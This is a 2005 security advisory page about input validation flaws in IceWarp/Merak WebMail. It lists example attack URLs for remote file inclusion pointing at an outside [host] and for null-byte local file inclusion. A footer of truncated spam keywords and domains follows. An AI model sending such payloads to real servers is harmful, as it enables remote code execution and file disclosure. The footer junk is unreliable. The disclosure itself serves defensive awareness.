about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , IceWarp Universal WebMail Multiple Input Validation Vulnerabilities


Title IceWarp Universal WebMail Multiple Input Validation Vulnerabilities
Published 2005-12-27-12:00AM
Updated 2005-12-27-05:23PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovered by Tan Chew Keong.
Vulnerable  Merak Mail Server 8.3 .0.r
Deerfield VisNetic Mail Server 8.3 .0 build 1
Not Vulnerable  
Code   An exploit is not required.

The following examples were provided:

http://example.com:32000/accounts/inc/include.php?language=0&lang_settings[0][1]=http://[host]/

http://example.com:32000/admin/inc/include.php?language=0&lang_settings[0][1]=http://[host]/

http://example.com:32000/dir/include.html?lang=[file]%00

http://example.com:32000/mail/settings.html?id=[current_id]&Save_x=1&language=TEST

http://example.com:32000/mail/index.html?id=[current_id]&lang_settings[TEST]=test;http://[host]/;

http://example.com:32000/mail/index.html?/mail/index.html?default_layout=OUTLOOK2003&layout_settings[OUTLOOK2003]=test;[file]%00;2
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 05 Dec 2009 04:31:07 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.sex wo rap www.sz599. Elisabeth One Tree H 200 /compo you88cn.cn F_A.6861:@ SSL SERVIC MoviePlaye .Adg 200 /compo CMS is Fre Ayub www.kkshu. pota news for c GET /u xxxsex shop.paipa www.vieway www.bangal Counter st www.nc-cio pnphpbb2 200 /compo CMS is Fre news for c ventrilo 2 www.2061zj Lotus Domi All Legal Wap+sex Weblogs Hot and se /search/ex SecurityDo CMS is Fre http:/www. whbaidutui Spictur nantharase www.nudepi savin.cn telugusexc www.wwq7.c old jjje.c Homesex.co shop593204 news for C